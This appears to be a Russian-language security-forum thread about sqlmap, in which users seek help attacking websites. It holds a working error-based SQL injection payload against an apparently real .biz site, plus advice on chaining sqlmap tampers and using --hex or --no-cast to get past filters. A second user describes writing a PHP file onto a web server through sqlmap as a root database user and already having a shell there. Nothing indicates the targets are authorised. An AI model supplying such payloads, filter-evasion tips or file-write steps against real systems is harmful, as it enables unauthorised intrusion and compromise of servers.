ArsenalWest
Member
- 19.03.2020
- 9
- 0
-
B правой части каждого сообщения есть стрелки ⇧ и ⇩. Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок ✔ в правой части сообщения.
-
🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»
🛡 Научитесь находить и использовать уязвимости веб-приложений.
🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.Доступ открыт прямо сейчас — Записаться бесплатно
Вопрос по sqlmap
- Автор темы ArsenalWest
- Дата начала
ArsenalWest
Member
- 19.03.2020
- 9
- 0
.biz/1'or(ExtractValue(1,concat(0x3a,(SELECT/**/TABLE_NAME/**/FROM/**/information_schema.TABLES/**/LIMIT/**/40,1),(':'))))--'
Имя бд выдает. Подскажите вектор для sqlmap
space2comment не помогает
Имя бд выдает. Подскажите вектор для sqlmap
space2comment не помогает
1. нужно смотреть что фильтрует, ставь verbose 3 минимум
2. space2comment заменяет пробелы “/ ** /” и это не панацея, программа просит использовать тампер и в пример ставит space2comment. Тамперов много, можно что-то написать самому если ничего из базы не подойдет
3. можно использовать сразу несколько тамперов и не забудь еще про --hex или --no-cast
2. space2comment заменяет пробелы “/ ** /” и это не панацея, программа просит использовать тампер и в пример ставит space2comment. Тамперов много, можно что-то написать самому если ничего из базы не подойдет
3. можно использовать сразу несколько тамперов и не забудь еще про --hex или --no-cast
my3uka
Member
- 20.04.2019
- 15
- 0
Здравствуйте, спрошу сдесь.
Запись файла на сервер успешна, файл есть на сервере, также он работает через браузер, также он есть если смотреть через шелл.
is-dba: true
user: root
privilege : ALL
sqlmap --file-write=test.php --file-desk=/var/www/my_site/test.php
Потом я хочу его прочитать sqlmap --file-read=/var/www/my_site/test.php, sqlmap не может его прочитать.
Немогу понять, или ето sqlmap не работает или ??? Запись работает, а чтение нет, как так?
Запись файла на сервер успешна, файл есть на сервере, также он работает через браузер, также он есть если смотреть через шелл.
is-dba: true
user: root
privilege : ALL
sqlmap --file-write=test.php --file-desk=/var/www/my_site/test.php
Потом я хочу его прочитать sqlmap --file-read=/var/www/my_site/test.php, sqlmap не может его прочитать.
Код:
[ERROR] no data retrievedНемогу понять, или ето sqlmap не работает или ??? Запись работает, а чтение нет, как так?
InetTester
Green Team
- 21.10.2018
- 308
- 43
Попробуй его wget-ом или curl-ом и посмотри код ошибки который вернет тебе сервер.
InetTester
Green Team
- 21.10.2018
- 308
- 43
Может тогда стоит включить отладку в sqlmap-е и посмотреть что происходит например так " -v 3"
Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab
